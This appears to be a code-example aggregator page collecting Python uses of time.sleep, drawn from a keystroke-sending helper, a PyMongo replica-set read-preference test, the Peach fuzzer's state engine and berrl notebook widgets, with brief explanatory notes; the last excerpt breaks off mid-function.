            # Add the virtual key to the modifier virtual key list
            modifier_s.append(vk)

            # Set last virtual key is modifier be True
            last_vk_is_modifier = True

        # If the virtual key is not modifier
        else:
            # Add the virtual key to the non-modifier virtual key list
            non_modifier_s.append(vk)

            # Set last virtual key is modifier be False
            last_vk_is_modifier = False

    # If the modifier or non-modifier virtual key list is not empty
    if modifier_s or non_modifier_s:
        # Add the last group's modifiers and non-modifiers to the group list
        group_s.append((modifier_s, non_modifier_s))

    # Set the modifier virtual key list be None
    modifier_s = None

    # Set the non-modifier virtual key list be None
    non_modifier_s = None

    # Get initial group's modifier and non-modifier virtual key lists
    initial_group = (
        tuple(vk for vk in vks_pressed if vk in _MODIFIER_VKS),
        tuple(vk for vk in vks_pressed if vk not in _MODIFIER_VKS),
    )

    # If need release initial non-modifier keys
    if release_initial_keys:
        # For initial group's each non-modifier virtual key
        for vk in initial_group[1]:
            # Send key-up event
            key_up_sc(vk)

    # Use the initial group as the initial previous group
    previous_group = initial_group

    # Get max group index
    group_idx_max = len(group_s) - 1

    # For the group list's each group
    for group_idx, group in enumerate(group_s):
        # Get previous group's modifiers
        modifier_s_old, _ = previous_group

        # Get current group's modifiers and non-modifiers
        modifier_s_new, non_modifier_s_new = group

        # ----- Press new modifiers -----
        # Get max index of the new modifier list
        vk_idx_max = len(modifier_s_new) - 1

        # For the new modifier list's each virtual key
        for vk_idx, vk in enumerate(modifier_s_new):
            # Send key-down event
            key_dn_sc(vk)

            # If have modifier interval
            if modifier_interval:
                # If the index is not the max index
                if vk_idx != vk_idx_max:
                    # Sleep for modifier interval
                    _time.sleep(modifier_interval)
        # ===== Press new modifiers =====

        # ----- Release old modifiers -----
        # Get the two modifier lists' difference list.
        # The difference list contains the modifiers that should be released.
        modifier_s_diff = _list_diff(modifier_s_old, modifier_s_new)

        # For the difference list's each virtual key
        for vk in modifier_s_diff:
            # Send key-up event.
            #
            # Use `key_up_sc` because `key_up` does not work for DirectInput.
            key_up_sc(vk)
        # ===== Release old modifiers =====

        # ----- Press new non-modifiers -----
        # Get max index of the new non-modifier list
        vk_idx_max = len(non_modifier_s_new) - 1

        # For the new non-modifier list's each virtual key
        for vk_idx, vk in enumerate(non_modifier_s_new):
            # Send key-down event.
            #
            # Use `key_dn_sc` because `key_dn` does not work for DirectInput.
            key_dn_sc(vk)

            # If have key duration
            if key_duration:
                # If the index is not the max index
                if vk_idx != vk_idx_max:
                    # Sleep for key duration
                    _time.sleep(key_duration)

            # Send key-up event
            key_up_sc(vk)
        # ===== Press new non-modifiers =====

        # ----- Release new modifiers -----
        # For the new modifier list's each virtual key, in reverse order
        for vk in reversed(modifier_s_new):
            # Send key-up event
            key_up_sc(vk)
        # ===== Release new modifiers =====

        # Set the previous group be the current group for next group
        previous_group = group

        # If have key interval
        if key_interval:
            # If is not the last group
            if group_idx != group_idx_max:
                # Sleep for key interval
                _time.sleep(key_interval)

    # If need restore initial modifiers after sending the keys
    if restore_initial_modifiers:
        # If the initial group is not the only group
        if previous_group is not initial_group:
            # Get initial group's modifier list
            initial_modifier_s, _ = initial_group

            # Get the max index
            vk_idx_max = len(initial_modifier_s) - 1

            # For each virtual key in the initial group's modifier list
            for vk_idx, vk in enumerate(initial_modifier_s):
                # Send key-down event
                key_dn_sc(vk)

                # If a modifier interval is given
                if modifier_interval:
                    # If this is not the last modifier
                    if vk_idx != vk_idx_max:
                        # Sleep for modifier interval
                        _time.sleep(modifier_interval)
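
The helper above leans on time.sleep in three places: modifier_interval paces successive modifier key-downs, key_duration holds a non-modifier key briefly before releasing it, and key_interval spaces the key groups apart. Below is a minimal, self-contained sketch of that pacing pattern; key_dn_sc and key_up_sc are stand-in stubs here, not the project's real send-input calls.

import time

def key_dn_sc(vk):
    # Stand-in stub for a real scan-code key-down call
    print('down', vk)

def key_up_sc(vk):
    # Stand-in stub for a real scan-code key-up call
    print('up', vk)

def send_chord(modifiers, keys, modifier_interval=0.01, key_duration=0.05):
    # Press modifiers, pausing briefly between them
    for i, vk in enumerate(modifiers):
        key_dn_sc(vk)
        if modifier_interval and i != len(modifiers) - 1:
            time.sleep(modifier_interval)

    # Press each non-modifier, hold it for key_duration, then release it
    for vk in keys:
        key_dn_sc(vk)
        if key_duration:
            time.sleep(key_duration)
        key_up_sc(vk)

    # Release the modifiers in reverse order
    for vk in reversed(modifiers):
        key_up_sc(vk)

send_chord(['CTRL', 'SHIFT'], ['S'])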

Example 36

Project: mongo-python-driver
Source File: test_ha.py
View license
    def test_read_preference(self):
        # We pass through four states:
        #
        #       1. A primary and two secondaries
        #       2. Primary down
        #       3. Primary up, one secondary down
        #       4. Primary up, all secondaries down
        #
        # For each state, we verify the behavior of PRIMARY,
        # PRIMARY_PREFERRED, SECONDARY, SECONDARY_PREFERRED, and NEAREST
        c = MongoClient(
            self.seed,
            replicaSet=self.name,
            serverSelectionTimeoutMS=self.server_selection_timeout)
        wait_until(lambda: c.primary, "discover primary")
        wait_until(lambda: len(c.secondaries) == 2, "discover secondaries")

        def assertReadFrom(member, *args, **kwargs):
            utils.assertReadFrom(self, c, member, *args, **kwargs)

        def assertReadFromAll(members, *args, **kwargs):
            utils.assertReadFromAll(self, c, members, *args, **kwargs)

        def unpartition_node(node):
            host, port = node
            return '%s:%s' % (host, port)

        # To make the code terser, copy hosts into local scope
        primary = self.primary
        secondary = self.secondary
        other_secondary = self.other_secondary

        bad_tag = {'bad': 'tag'}

        # 1. THREE MEMBERS UP -------------------------------------------------
        #       PRIMARY
        assertReadFrom(primary, PRIMARY)

        #       PRIMARY_PREFERRED
        # Trivial: mode and tags both match
        assertReadFrom(primary, PRIMARY_PREFERRED, self.primary_dc)

        # Secondary matches but not primary, choose primary
        assertReadFrom(primary, PRIMARY_PREFERRED, self.secondary_dc)

        # Chooses primary, ignoring tag sets
        assertReadFrom(primary, PRIMARY_PREFERRED, self.primary_dc)

        # Chooses primary, ignoring tag sets
        assertReadFrom(primary, PRIMARY_PREFERRED, bad_tag)
        assertReadFrom(primary, PRIMARY_PREFERRED, [bad_tag, {}])

        #       SECONDARY
        assertReadFromAll([secondary, other_secondary], SECONDARY)

        #       SECONDARY_PREFERRED
        assertReadFromAll([secondary, other_secondary], SECONDARY_PREFERRED)

        # Multiple tags
        assertReadFrom(secondary, SECONDARY_PREFERRED, self.secondary_tags)

        # Fall back to primary if it's the only one matching the tags
        assertReadFrom(primary, SECONDARY_PREFERRED, {'name': 'primary'})

        # No matching secondaries
        assertReadFrom(primary, SECONDARY_PREFERRED, bad_tag)

        # Fall back from non-matching tag set to matching set
        assertReadFromAll([secondary, other_secondary],
            SECONDARY_PREFERRED, [bad_tag, {}])

        assertReadFrom(other_secondary,
            SECONDARY_PREFERRED, [bad_tag, {'dc': 'ny'}])

        #       NEAREST
        self.clear_ping_times()

        assertReadFromAll([primary, secondary, other_secondary], NEAREST)

        assertReadFromAll([primary, other_secondary],
            NEAREST, [bad_tag, {'dc': 'ny'}])

        self.set_ping_time(primary, 0)
        self.set_ping_time(secondary, .03) # 30 ms
        self.set_ping_time(other_secondary, 10)

        # Nearest member, no tags
        assertReadFrom(primary, NEAREST)

        # Tags override nearness
        assertReadFrom(primary, NEAREST, {'name': 'primary'})
        assertReadFrom(secondary, NEAREST, self.secondary_dc)

        # Make secondary fast
        self.set_ping_time(primary, .03) # 30 ms
        self.set_ping_time(secondary, 0)

        assertReadFrom(secondary, NEAREST)

        # Other secondary fast
        self.set_ping_time(secondary, 10)
        self.set_ping_time(other_secondary, 0)

        assertReadFrom(other_secondary, NEAREST)

        self.clear_ping_times()

        assertReadFromAll([primary, other_secondary], NEAREST, [{'dc': 'ny'}])

        # 2. PRIMARY DOWN -----------------------------------------------------
        killed = ha_tools.kill_primary()

        # Let monitor notice primary's gone
        time.sleep(2 * self.heartbeat_frequency)

        #       PRIMARY
        assertReadFrom(None, PRIMARY)

        #       PRIMARY_PREFERRED
        # No primary, choose matching secondary
        assertReadFromAll([secondary, other_secondary], PRIMARY_PREFERRED)
        assertReadFrom(secondary, PRIMARY_PREFERRED, {'name': 'secondary'})

        # No primary or matching secondary
        assertReadFrom(None, PRIMARY_PREFERRED, bad_tag)

        #       SECONDARY
        assertReadFromAll([secondary, other_secondary], SECONDARY)

        # Only primary matches
        assertReadFrom(None, SECONDARY, {'name': 'primary'})

        # No matching secondaries
        assertReadFrom(None, SECONDARY, bad_tag)

        #       SECONDARY_PREFERRED
        assertReadFromAll([secondary, other_secondary], SECONDARY_PREFERRED)

        # Mode and tags both match
        assertReadFrom(secondary, SECONDARY_PREFERRED, {'name': 'secondary'})

        #       NEAREST
        self.clear_ping_times()

        assertReadFromAll([secondary, other_secondary], NEAREST)

        # 3. PRIMARY UP, ONE SECONDARY DOWN -----------------------------------
        ha_tools.restart_members([killed])
        ha_tools.wait_for_primary()

        ha_tools.kill_members([unpartition_node(secondary)], 2)
        time.sleep(5)
        ha_tools.wait_for_primary()
        time.sleep(2 * self.heartbeat_frequency)

        #       PRIMARY
        assertReadFrom(primary, PRIMARY)

        #       PRIMARY_PREFERRED
        assertReadFrom(primary, PRIMARY_PREFERRED)

        #       SECONDARY
        assertReadFrom(other_secondary, SECONDARY)
        assertReadFrom(other_secondary, SECONDARY, self.other_secondary_dc)

        # Only the down secondary matches
        assertReadFrom(None, SECONDARY, {'name': 'secondary'})

        #       SECONDARY_PREFERRED
        assertReadFrom(other_secondary, SECONDARY_PREFERRED)
        assertReadFrom(
            other_secondary, SECONDARY_PREFERRED, self.other_secondary_dc)

        # The secondary matching the tag is down, use primary
        assertReadFrom(primary, SECONDARY_PREFERRED, {'name': 'secondary'})

        #       NEAREST
        assertReadFromAll([primary, other_secondary], NEAREST)
        assertReadFrom(other_secondary, NEAREST, {'name': 'other_secondary'})
        assertReadFrom(primary, NEAREST, {'name': 'primary'})

        # 4. PRIMARY UP, ALL SECONDARIES DOWN ---------------------------------
        ha_tools.kill_members([unpartition_node(other_secondary)], 2)

        #       PRIMARY
        assertReadFrom(primary, PRIMARY)

        #       PRIMARY_PREFERRED
        assertReadFrom(primary, PRIMARY_PREFERRED)
        assertReadFrom(primary, PRIMARY_PREFERRED, self.secondary_dc)

        #       SECONDARY
        assertReadFrom(None, SECONDARY)
        assertReadFrom(None, SECONDARY, self.other_secondary_dc)
        assertReadFrom(None, SECONDARY, {'dc': 'ny'})

        #       SECONDARY_PREFERRED
        assertReadFrom(primary, SECONDARY_PREFERRED)
        assertReadFrom(primary, SECONDARY_PREFERRED, self.secondary_dc)
        assertReadFrom(primary, SECONDARY_PREFERRED, {'name': 'secondary'})
        assertReadFrom(primary, SECONDARY_PREFERRED, {'dc': 'ny'})

        #       NEAREST
        assertReadFrom(primary, NEAREST)
        assertReadFrom(None, NEAREST, self.secondary_dc)
        assertReadFrom(None, NEAREST, {'name': 'secondary'})

        # Even if primary's slow, still read from it
        self.set_ping_time(primary, 100)
        assertReadFrom(primary, NEAREST)
        assertReadFrom(None, NEAREST, self.secondary_dc)

        self.clear_ping_times()
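
The fixed waits in this test (time.sleep(2 * self.heartbeat_frequency) and time.sleep(5)) simply give the client's monitor enough time to notice that a member went down or came back. When the condition can be checked directly, a small polling helper in the spirit of the test's wait_until is usually preferable to a fixed sleep; the version below is a hypothetical sketch, not the helper from PyMongo's test utilities.

import time

def wait_until(predicate, description, timeout=30.0, interval=0.5):
    # Poll `predicate` until it returns a truthy value, sleeping briefly
    # between attempts, and fail loudly if `timeout` elapses first.
    deadline = time.monotonic() + timeout
    while True:
        result = predicate()
        if result:
            return result
        if time.monotonic() > deadline:
            raise AssertionError('timed out waiting for %s' % description)
        time.sleep(interval)

# Example usage: wait for a flag that some other code is expected to set
flag = {'ready': False}
flag['ready'] = True
wait_until(lambda: flag['ready'], 'flag to become ready', timeout=2.0)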

Example 37

Project: peach
Source File: state.py
View license
    def _runAction(self, action, mutator):
        Debug(1, "\nStateEngine._runAction: %s" % action.name)

        mutator.onActionStarting(action.parent, action)

        # If publisher property has been given, use referenced Publisher; otherwise the first one
        if action.publisher is not None:
            pub = self._getPublisherByName(action.publisher)

            if pub is None:
                raise PeachException("Publisher '%s' not found!" % action.publisher)
        else:
            pub = self.publishers[0]

        # EVENT: when
        if action.when is not None:
            environment = {
                'Peach': self.engine.peach,
                'Action': action,
                'State': action.parent,
                'StateModel': action.parent.parent,
                'Mutator': mutator,
                'peachPrint': self.f,
                'sleep': time.sleep,
                'getXml': self.getXml,
                'random': random
            }

            if not evalEvent(action.when, environment, self.engine.peach):
                Debug(1, "Action when failed: " + action.when)
                return
            else:
                Debug(1, "Action when passed: " + action.when)

        Engine.context.watcher.OnActionStart(action)

        # EVENT: onStart
        if action.onStart is not None:
            environment = {
                'Peach': self.engine.peach,
                'Action': action,
                'State': action.parent,
                'StateModel': action.parent.parent,
                'Mutator': mutator,
                'peachPrint': self.f,
                'sleep': time.sleep
            }

            evalEvent(action.onStart, environment, self.engine.peach)

        if action.type == 'input':
            action.value = None

            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True
            if not pub.hasBeenConnected:
                pub.connect()
                pub.hasBeenConnected = True

            # Make a fresh copy of the template
            action.__delitem__(action.template.name)
            action.template = action.origionalTemplate.copy(action)
            action.append(action.template)

            # Create buffer
            buff = PublisherBuffer(pub)
            self.dirtyXmlCache()

            # Crack data
            cracker = DataCracker(self.engine.peach)
            (rating, _) = cracker.crackData(action.template, buff, "setDefaultValue")

            if rating > 2:
                raise SoftException("Was unble to crack incoming data into %s data model." % action.template.name)

            action.value = action.template.getValue()

        elif action.type == 'output':
            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True
            if not pub.hasBeenConnected:
                pub.connect()
                pub.hasBeenConnected = True

            # Run mutator
            mutator.onDataModelGetValue(action, action.template)

            # Get value
            if action.template.modelHasOffsetRelation:
                stringBuffer = StreamBuffer()
                action.template.getValue(stringBuffer)

                stringBuffer.setValue("")
                stringBuffer.seekFromStart(0)
                action.template.getValue(stringBuffer)

                action.value = stringBuffer.getValue()

            else:
                action.value = action.template.getValue()

            Debug(1, "Action output sending %d bytes" % len(action.value))

            if not pub.withNode:
                pub.send(action.value)
            else:
                pub.sendWithNode(action.value, action.template)

            # Save the data filename used for later matching
            if action.data is not None and action.data.fileName is not None:
                self.actionValues.append([action.name, 'output', action.value, action.data.fileName])

            else:
                self.actionValues.append([action.name, 'output', action.value])

            obj = Element(action.name, None)
            obj.elementType = 'dom'
            obj.defaultValue = action.value
            action.value = obj

        elif action.type == 'call':
            action.value = None

            actionParams = []

            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            # build up our call
            method = action.method
            if method is None:
                raise PeachException("StateEngine: Action of type \"call\" does not have method name!")

            params = []
            for c in action:
                if c.elementType == 'actionparam':
                    params.append(c)

            argNodes = []
            argValues = []
            for p in params:
                if p.type == 'out' or p.type == 'inout':
                    raise PeachException(
                        "StateEngine: Action of type \"call\" does not yet support out or inout parameters (bug in comtypes)!")

                # Run mutator
                mutator.onDataModelGetValue(action, p.template)

                # Get value
                if p.template.modelHasOffsetRelation:
                    stringBuffer = StreamBuffer()
                    p.template.getValue(stringBuffer)
                    stringBuffer.setValue("")
                    stringBuffer.seekFromStart(0)
                    p.template.getValue(stringBuffer)

                    p.value = stringBuffer.getValue()

                else:
                    p.value = p.template.getValue()

                argValues.append(p.value)
                argNodes.append(p.template)

                actionParams.append([p.name, 'param', p.value])

            if not pub.withNode:
                ret = pub.call(method, argValues)
            else:
                ret = pub.callWithNode(method, argValues, argNodes)

            # look for and set return
            for c in action:
                if c.elementType == 'actionresult':
                    self.dirtyXmlCache()

                    print("RET: %s %s" % (ret, type(ret)))

                    data = None
                    if type(ret) == int:
                        data = struct.pack("i", ret)
                    elif type(ret) == long:
                        data = struct.pack("q", ret)
                    elif type(ret) == str:
                        data = ret

                    if c.template.isPointer:
                        print("Found ctypes pointer...trying to cast...")
                        retCtype = c.template.asCTypeType()
                        retCast = ctypes.cast(ret, retCtype)

                        for i in range(len(retCast.contents._fields_)):
                            (key, value) = retCast.contents._fields_[i]
                            value = eval("retCast.contents.%s" % key)
                            c.template[key].defaultValue = value
                            print("Set [%s=%s]" % (key, value))

                    else:
                        cracker = DataCracker(self.engine.peach)
                        cracker.haveAllData = True
                        (rating, _) = cracker.crackData(c.template, PublisherBuffer(None, data, True))
                        if rating > 2:
                            raise SoftException("Was unble to crack result data into %s data model." % c.template.name)

            self.actionValues.append([action.name, 'call', method, actionParams])

        elif action.type == 'getprop':
            action.value = None

            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            # build up our call
            property = action.property
            if property is None:
                raise Exception("StateEngine._runAction(): getprop type does not have property name!")

            data = pub.property(property)

            self.actionValues.append([action.name, 'getprop', property, data])

            self.dirtyXmlCache()

            cracker = DataCracker(self.engine.peach)
            (rating, _) = cracker.crackData(action.template, PublisherBuffer(None, data))
            if rating > 2:
                raise SoftException("Was unble to crack getprop data into %s data model." % action.template.name)

            # If no exception, it worked

            action.value = action.template.getValue()

            if Peach.Engine.engine.Engine.debug:
                print("*******POST GETPROP***********")
                doc = self.getXml()
                print(etree.tostring(doc, method="html", pretty_print=True))
                print("******************")

        elif action.type == 'setprop':
            action.value = None

            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            # build up our call
            property = action.property
            if property is None:
                raise Exception("StateEngine: setprop type does not have property name!")

            value = None
            valueNode = None
            for c in action:
                if c.elementType == 'actionparam' and c.type == "in":
                    # Run mutator
                    mutator.onDataModelGetValue(action, c.template)

                    # Get value
                    if c.template.modelHasOffsetRelation:
                        stringBuffer = StreamBuffer()
                        c.template.getValue(stringBuffer)
                        stringBuffer.setValue("")
                        stringBuffer.seekFromStart(0)
                        c.template.getValue(stringBuffer)

                        value = c.value = stringBuffer.getValue()

                    else:
                        value = c.value = c.template.getValue()

                    valueNode = c.template
                    break

            if not pub.withNode:
                pub.property(property, value)
            else:
                pub.propertyWithNode(property, value, valueNode)

            self.actionValues.append([action.name, 'setprop', property, value])

        elif action.type == 'changeState':
            action.value = None
            self.actionValues.append([action.name, 'changeState', action.ref])
            mutator.onActionFinished(action.parent, action)
            raise StateChangeStateException(self._getStateByName(action.ref))

        elif action.type == 'slurp':
            action.value = None

            #startTime = time.time()

            doc = self.getXml()
            setNodes = doc.xpath(action.setXpath)
            if len(setNodes) == 0:
                print(etree.tostring(doc, method="html", pretty_print=True))
                raise PeachException("Slurp [%s] setXpath [%s] did not return a node" % (action.name, action.setXpath))

            # Only do this once :)
            valueElement = None
            if action.valueXpath is not None:
                valueNodes = doc.xpath(action.valueXpath)
                if len(valueNodes) == 0:
                    print("Warning: valueXpath did not return a node")
                    raise SoftException("StateEngine._runAction(xpath): valueXpath did not return a node")

                valueNode = valueNodes[0]
                try:
                    valueElement = action.getRoot().getByName(str(valueNode.get("fullName")))

                except:
                    print("valueNode: %s" % valueNode)
                    print("valueNode.nodeName: %s" % split_ns(valueNode.tag)[1])
                    print("valueXpath: %s" % action.valueXpath)
                    print("results: %d" % len(valueNodes))
                    raise PeachException("Slurp AttributeError: [%s]" % str(valueNode.get("fullName")))

            for node in setNodes:
                setElement = action.getRoot().getByName(str(node.get("fullName")))

                if valueElement is not None:
                    Debug(1, "Action-Slurp: 1 Setting %s from %s" % (
                        str(node.get("fullName")),
                        str(valueNode.get("fullName"))
                    ))

                    valueElement = action.getRoot().getByName(str(valueNode.get("fullName")))

                    # Some elements like Block do not have a current or default value
                    if valueElement.currentValue is None and valueElement.defaultValue is None:
                        setElement.currentValue = None
                        setElement.defaultValue = valueElement.getValue()

                    else:
                        setElement.currentValue = valueElement.getValue()
                        setElement.defaultValue = valueElement.defaultValue

                    setElement.value = None

                #print " --- valueElement --- "
                #pub.send(valueElement.getValue())
                #print " --- setElement --- "
                #pub.send(setElement.getValue())
                #print " --------------------"

                else:
                    Debug(1, "Action-Slurp: 2 Setting %s to %s" % (
                        str(node.get("fullName")),
                        repr(action.valueLiteral)
                    ))

                    setElement.defaultValue = action.valueLiteral
                    setElement.currentValue = None
                    setElement.value = None

                    #print " - Total time to slurp data: %.2f" % (time.time() - startTime)

        elif action.type == 'connect':
            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            pub.connect()
            pub.hasBeenConnected = True

        elif action.type == 'accept':
            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            pub.accept()
            pub.hasBeenConnected = True

        elif action.type == 'close':
            if not pub.hasBeenConnected:
                # If we haven't been opened lets ignore
                # this close.
                return

            pub.close()
            pub.hasBeenConnected = False

        elif action.type == 'start':
            pub.start()
            pub.hasBeenStarted = True

        elif action.type == 'stop':
            if pub.hasBeenStarted:
                pub.stop()
                pub.hasBeenStarted = False

        elif action.type == 'wait':
            time.sleep(float(action.valueLiteral))

        else:
            raise Exception("StateEngine._runAction(): Unknown action.type of [%s]" % str(action.type))

        # EVENT: onComplete
        if action.onComplete is not None:
            environment = {
                'Peach': self.engine.peach,
                'Action': action,
                'State': action.parent,
                'Mutator': mutator,
                'StateModel': action.parent.parent,
                'sleep': time.sleep
            }

            evalEvent(action.onComplete, environment, self.engine.peach)

        mutator.onActionFinished(action.parent, action)
        Engine.context.watcher.OnActionComplete(action)
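
Two uses of time.sleep stand out here: the 'wait' action sleeps for action.valueLiteral seconds, and every event environment exposes time.sleep under the name sleep so that when, onStart, and onComplete expressions in a pit definition can pause. The snippet below is a hypothetical, stripped-down sketch of that second idea, not Peach's actual evalEvent: a scripted expression is evaluated with sleep injected into its namespace.

import time

def eval_event(expression, extra_env=None):
    # Hypothetical, simplified stand-in for an event evaluator: run a small
    # expression with time.sleep exposed as `sleep` so the script can pause.
    env = {'sleep': time.sleep}
    if extra_env:
        env.update(extra_env)
    return eval(expression, {'__builtins__': {}}, env)

# Example: delay for half a second, then let the action proceed
print(eval_event('sleep(0.5) or True'))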

Example 39

Project: berrl
Source File: pipewidgets.py
View license
def instance_widgets(data,dictlist,ouput_filename,geo_feature_type):
	
	# instancing filename for global use
	global filename			
	global initialdata
	global filtereddict
	global dictlistglobal
	initialdata = data
	filename = ouput_filename
	count = 0
	fieldlist = []
	filtereddict = {}
	widgetslist = []
	dictlistglobal = dictlist


	# iterating through each row in dictlist (each widget)
	for row in dictlist:
		# appending row to fieldlist
		fieldlist.append(row['field'])
		#print row,count
		#raw_input('ddd')
		# instancing a global var for geo_feature_type
		global geotype
		geotype  = geo_feature_type

		widget_type = row['type']
		if widget_type == 'FloatSlider' or widget_type == 'IntSlider':
			# getting field and passing in filtereddata/fields
			# as global parameters to wrap the created function
			field = row['field']
			global filtereddata
			global field
			global geotype
			global filename
			global fieldlist
			field = row['field']

			if count == 0:
				# function that takes to min and max
				# then slices df appropriately
				def on_value_change_first(min,max):
					global filtereddata
					global field
					global geotype
					global filename
					global filtereddict
					global initialdata
					global fieldlist
					

					# getting header values
					header = initialdata.columns.values.tolist()

					# slicing the df by min/max
					new = initialdata[(initialdata[field]>=min)&(initialdata[field]<=max)]
					'''
					if len(new) == 0:
						make_dummy(header,geo_feature_type)
					else:
						make_type(new,filename,geo_feature_type)
					'''
					make_dummy(header,geo_feature_type)



					lastupdate = {'value':True}

					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)

					time.sleep(.5)

					# updating json object that will be hashed
					lastupdate = {'value':False}


					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)
					
					filtereddata = new

					if len(filtereddict) == 0:
						filtereddict = {field:filtereddata}
					else:
						filtereddict[field] = filtereddata

					#if dictlistglobal[-1]['field'] == field and len(widgetslist) == len(dictlistglobal) and oldrange == 0:
					if len(widgetslist) == len(dictlistglobal):
						count = 0
						oldrow = fieldlist[0]
						# code to update slices here
						for row in fieldlist[:]:
							count += 1
							if not dictlistglobal[count-1]['type'] == 'Dropdown':
								minval,maxval = filtereddata[row].min(),filtereddata[row].max() 
								testval = tabs.children[count-1].children[0].children[1].value - tabs.children[count-1].children[0].children[0].value
								print (maxval - minval),testval
								if (maxval - minval) < testval:
									tabs.children[count-1].children[0].children[0].value = minval
									tabs.children[count-1].children[0].children[1].value = maxval
						make_type(new,filename,geo_feature_type)
	




				# getting slider 1 and slider2
				slider1,slider2 = row['widget']
				
				# instantiating widget with the desired range slices/function mapping
				on_value_change_first(initialdata[field].min(),initialdata[field].max())

				newwidget = widgets.interactive(on_value_change_first,min=slider1,max=slider2)
				newwidget = widgets.Box(children=[newwidget])
				widgetslist.append(newwidget)
			else:
				field = row['field']
				global tabs
				global oldrange
				oldrange = 0

				# function that takes to min and max
				# then slices df appropriately
				def on_value_change(min,max):
					global filtereddata
					global field
					global geotype
					global filename
					global filtereddict
					global fieldlist
					global tabs
					global oldrange

					field = fieldlist[-1]

					if not dictlistglobal[-1]['field'] == field:
						oldrange = 0


					if fieldlist[0] == field:
						filtereddata = filtereddict[field]
					else:
						#raw_input('xxx')
						filtereddata = get_df(field,fieldlist,filtereddict)
					


					# getting header value
					header = filtereddata.columns.values.tolist()

					# slicing the df by min/max
					new = filtereddata[(filtereddata[field]>=min)&(filtereddata[field]<=max)]
					
					'''
					if len(new) == 0:
						make_dummy(header,geo_feature_type)
					else:
						make_type(new,filename,geo_feature_type)
					'''
					make_dummy(header,geo_feature_type)


					lastupdate = {'value':True}

					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)

					time.sleep(.5)

					# updating json object that will be hashed
					lastupdate = {'value':False}


					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)
					
					filtereddata = new

					filtereddict[field] = filtereddata

					#if not dictlistglobal[-1]['field'] == field:
					#	oldrange = 0


					#if dictlistglobal[-1]['field'] == field and len(widgetslist) == len(dictlistglobal) and oldrange == 0:
					if len(widgetslist) == len(dictlistglobal):
						count = 0
						oldrow = fieldlist[0]
						# code to update slices here
						for row in fieldlist[:]:
							count += 1
							if not dictlistglobal[count-1]['type'] == 'Dropdown':
								minval,maxval = filtereddata[row].min(),filtereddata[row].max() 
								testval = tabs.children[count-1].children[0].children[1].value - tabs.children[count-1].children[0].children[0].value
								print (maxval - minval),testval
								if (maxval - minval) < testval:
									tabs.children[count-1].children[0].children[0].value = minval
									tabs.children[count-1].children[0].children[1].value = maxval
						make_type(new,filename,geo_feature_type)



				# getting slider 1 and slider2
				slider1,slider2 = row['widget']

				# instantiating widget with the desired range slices/function mapping
				on_value_change(initialdata[field].min(),initialdata[field].max())
				newwidget = widgets.interactive(on_value_change,min=slider1,max=slider2)
				newwidget = widgets.Box(children=[newwidget])
				widgetslist.append(newwidget)

		elif widget_type == 'Dropdown':
			global fieldcategory
			global filtereddata
			global geotype
			global filename
			global filtereddict
			global fieldlist
			fieldcategory = row['field']
			uniques = ['ALL'] + np.unique(data[fieldcategory]).tolist()


			# function that slices by category input by 
			# dropdown box within widget
			def slice_by_category(on_dropdown):
				global filtereddata
				global fieldcategory
				global geo_feature_type
				global filename
				global filtereddict
				global fieldlist

				filtereddata = get_df(fieldcategory,fieldlist,filtereddict)
				# getting header
				header = filtereddata.columns.values.tolist()

				# slicing category by appropriate field
				if not on_dropdown == 'ALL':
					new = filtereddata[filtereddata[fieldcategory]==on_dropdown]
				elif on_dropdown == 'ALL':
					new = filtereddata
				
				# updating json object that will be hashed
				lastupdate = {'value':True}


				# checking to see if data actually has values
				if len(new) == 0:
					make_dummy(header,geotype)
				else:
					make_type(new,filename,geotype)


				with open('data.json','wb') as jsonfile:
					json.dump(lastupdate,jsonfile)

				time.sleep(.5)

				# updating json object that will be hashed
				lastupdate = {'value':False}


				with open('data.json','wb') as jsonfile:
					json.dump(lastupdate,jsonfile)

				filtereddata = new

				filtereddict[fieldcategory] = filtereddata  

				print np.unique(new[fieldcategory])
			# getting drop down feature from current row in dictlist
			dropdownwidget = row['widget']

			# instantiating widget for dropdown categorical values in a field
			slice_by_category('ALL')
			dropdownwidget.observe(slice_by_category, names='on_dropdown')
			newwidget = widgets.interactive(slice_by_category,on_dropdown=uniques)
			newwidget = widgets.Box(children = [newwidget])
			widgetslist.append(newwidget)
		print count
		count += 1
	
	tabs = widgets.Tab(children=widgetslist)
	count = 0
	for row in fieldlist:
		tabs.set_title(count,row)
		count += 1
	display(tabs)
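
Each widget callback above signals a refresh by writing {'value': True} to data.json, sleeping half a second, and then writing {'value': False}, so whatever polls the file is guaranteed to see the flag go up. Below is a rough Python 3 sketch of that pulse pattern (the original opens the file in 'wb' mode, which is Python 2 specific; the file name and hold time here are just illustrative defaults).

import json
import time

def pulse_update_flag(path='data.json', hold=0.5):
    # Raise the flag so a polling consumer notices the update
    with open(path, 'w') as jsonfile:
        json.dump({'value': True}, jsonfile)

    # Hold the flag up long enough for at least one polling cycle to see it
    time.sleep(hold)

    # Lower the flag again
    with open(path, 'w') as jsonfile:
        json.dump({'value': False}, jsonfile)

pulse_update_flag()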

Example 41

Project: berrl
Source File: pipewidgets.py
View license
def instance_widgets(data,dictlist,ouput_filename,geo_feature_type):
	
	# instancing filename for global use
	global filename			
	global initialdata
	global filtereddict
	global dictlistglobal
	initialdata = data
	filename = ouput_filename
	count = 0
	fieldlist = []
	filtereddict = {}
	widgetslist = []
	dictlistglobal = dictlist


	# iterating through each row in dictlist (each widget)
	for row in dictlist:
		# appending row to fieldlist
		fieldlist.append(row['field'])
		#print row,count
		#raw_input('ddd')
		# instancing a global var for geo_feature_type
		global geotype
		geotype  = geo_feature_type

		widget_type = row['type']
		if widget_type == 'FloatSlider' or widget_type == 'IntSlider':
			# getting field and passing in filtereddata/fields
			# as global parameters to wrap the created function
			field = row['field']
			global filtereddata
			global field
			global geotype
			global filename
			global fieldlist
			field = row['field']

			if count == 0:
				# function that takes to min and max
				# then slices df appropriately
				def on_value_change_first(min,max):
